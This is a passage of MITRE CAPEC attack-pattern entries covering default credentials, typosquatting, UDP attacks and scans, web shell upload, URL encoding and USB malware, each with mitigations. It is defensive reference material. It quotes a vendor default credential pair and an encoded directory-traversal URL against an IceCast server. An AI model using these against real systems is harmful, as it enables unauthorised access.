2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Try All Common Application Switches and Options

CAPEC-70: Try Common or Default Usernames and Passwords

Attack Pattern ID: 70

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	700	Network Boundary Bridging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Prerequisites

The system uses one factor password based authentication.The adversary has the means to interact with the system.

Skills Required

[Level: Low]

An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known.

Resources Required

Technology or vendor specific list of default usernames and passwords.

Indicators

Many incorrect login attempts are detected by the system.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Delete all default account credentials that may be put in by the product vendor.

Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.

Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.

Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.

Example Instances

A user sets their password to "123" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.

Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username "root" with a password "password". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288

In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]

Related Weaknesses

CWE-ID	Weakness Name
521	Weak Password Requirements
262	Not Using Password Aging
263	Password Aging with Long Expiration
798	Use of Hard-coded Credentials
654	Reliance on a Single Factor in a Security Decision
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1078.001	Valid Accounts:Default Accounts

References

[REF-572] "Corporate IoT – a path to intrusion". Microsoft Security Response Center (MSRC). 2019-10-05. <https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion>. URL validated: 2020-05-05.

[REF-574] "Risks of Default Passwords on the Internet". Cybersecurity and Infrastructure Security Agency (CISA). 2016-10-07. <https://www.us-cert.gov/ncas/alerts/TA13-175A>. URL validated: 2020-05-05.

[REF-596] "OWASP Web Security Testing Guide". Testing for Account Enumeration and Guessable User Account. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html>.

[REF-597] "OWASP Web Security Testing Guide". Testing for Default Credentials. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Try Common(default) Usernames and Passwords

CAPEC-630: TypoSquatting

Attack Pattern ID: 630

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.
Techniques
Research popular or high traffic websites.

Experiment

Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.
Techniques
Register the TypoSquatted domain.

Exploit

Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.

Techniques
Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.
Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain.

Prerequisites

An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets.

Skills Required

[Level: Low]

Adversaries must be able to register DNS hostnames/URL’s.

Consequences

Scope	Impact	Likelihood
Other	Other

Mitigations

Authenticate all servers and perform redundant checks when using DNS hostnames.

Purchase potential TypoSquatted domains and forward to legitimate domain.

Example Instances

An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.

However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.

The user is directed to the adversary's website, which appears as if it is the legitimate paypal.com login page.

The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.

TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-486: UDP Flood

Attack Pattern ID: 486

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP.

Mitigations

To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-495: UDP Fragmentation

Attack Pattern ID: 495

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data.

Mitigations

This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling
404	Improper Resource Shutdown or Release

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-424] Yossi Gilad and Amir Herzberg. "Fragmentation Considered Vulnerable". 2012. <http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-298: UDP Ping

Attack Pattern ID: 298

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary requires the ability to send a UDP datagram to a remote host and receive a response.

The adversary requires the ability to craft custom UDP Packets for use during network reconnaissance.

The target's firewall must not be configured to block egress ICMP messages.

Resources Required

UDP pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Configure your firewall to block egress ICMP messages.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 47. 6th Edition. McGraw Hill. 2009.

[REF-158] J. Postel. "RFC768 - User Datagram Protocol". 1980-08-28. <http://www.faqs.org/rfcs/rfc768.html>.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.6.3 TCP UDP Ping, pg. 63. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-308: UDP Scan

Attack Pattern ID: 308

Abstraction: Detailed

View customized information:

Description

Extended Description

During a UDP scan, a datagram is sent to a target port. If an 'ICMP Type 3 Port unreachable' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends UDP packets to target ports.
An adversary uses the response from the target to determine the port's state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open.

Prerequisites

The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply.

Resources Required

The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Firewalls or ACLs which block egress ICMP error types effectively prevent UDP scans from returning any useful information.

UDP scanning is complicated by rate limiting mechanisms governing ICMP error messages.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 54-69. 6th Edition. McGraw Hill. 2009.

[REF-158] J. Postel. "RFC768 - User Datagram Protocol". 1980-08-28. <http://www.faqs.org/rfcs/rfc768.html>.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.4 RPC Grinding, pg. 101. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, References, Related_Weaknesses, Solutions_and_Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-650: Upload a Web Shell to a Web Server

Attack Pattern ID: 650

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The web server is susceptible to one of the various web application exploits that allows for uploading a shell file.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.

Ensure that the file permissions in directories on the web server from which files can be execute is set to the "least privilege" settings, and that those directories contents is controlled by an allowlist.

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication
553	Command Shell in Externally Accessible Directory

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1505.003	Server Software Component:Web Shell

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-31 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-31 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations

CAPEC-72: URL Encoding

Attack Pattern ID: 72

Abstraction: Detailed

View customized information:

Description

This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.

Extended Description

A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE).

For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An adversary will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL.

It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The adversary could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an adversary may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	267	Leverage Alternate Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Survey web application for URLs with parameters: Using a browser, an automated tool or by inspecting the application, an adversary records all URLs that contain parameters.
Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.

Experiment

Probe URLs to locate vulnerabilities: The adversary uses the URLs gathered in the "Explore" phase as a target list and tests parameters with different encodings of special characters to see how the web application will handle them.

Techniques
Use URL encodings of special characters such as semi-colons, backslashes, or question marks that might be filtered out normally.
Combine the use of URL encodings with other encoding techniques such as the triple dot and escape slashes.

Exploit

Inject special characters into URL parameters: Using the information gathered in the "Experiment" phase, the adversary injects special characters into the URL using URL encoding. This can lead to path traversal, cross-site scripting, SQL injection, etc.

Prerequisites

The application should accepts and decodes URL input.

The application performs insufficient filtering/canonicalization on the URLs.

Skills Required

[Level: Low]

An adversary can try special characters in the URL and bypass the URL validation.

[Level: Medium]

The adversary may write a script to defeat the input filtering mechanism.

Indicators

If the first decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.

Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Availability	Resource Consumption
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Refer to the RFCs to safely decode URL.

Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.

There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).

Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)

Example Instances

URL Encodings in IceCast MP3 Server.

The following type of encoded string has been known traverse directories against the IceCast MP3 server9:

http://[targethost]:8000/somefile/%2E%2E/target.mp3

or using

"/%25%25/" instead of "/../".

The control character ".." can be used by an adversary to escape the document root.

CAPEC-457: USB Memory Attacks

Attack Pattern ID: 457

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	456	Infected Memory
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	529	Malware-Directed Internal Reconnaissance

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Determine Target System: In certain cases, the adversary will explore an organization's network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.
Techniques
If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Experiment

Develop or Obtain malware and install on a USB device: The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.
Techniques
The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes.

Exploit

Connect or deceive a user into connecting the infected USB device: Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.

Techniques
The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc.

Prerequisites

Some level of physical access to the device being attacked.

Information pertaining to the target organization on how to best execute a USB Drop Attack.

Mitigations

Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.

Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.

Do not connect untrusted USB devices to systems connected on an organizational network. Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist.

Related Weaknesses

CWE-ID	Weakness Name
1299	Missing Protection Mechanism for Alternate Hardware Interface

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1091	Replication Through Removable Media
1092	Communication Through Removable Media

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Mitigations
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-644: Use of Captured Hashes (Pass The Hash)

Attack Pattern ID: 644

Abstraction: Detailed

View customized information:

Description

Extended Description

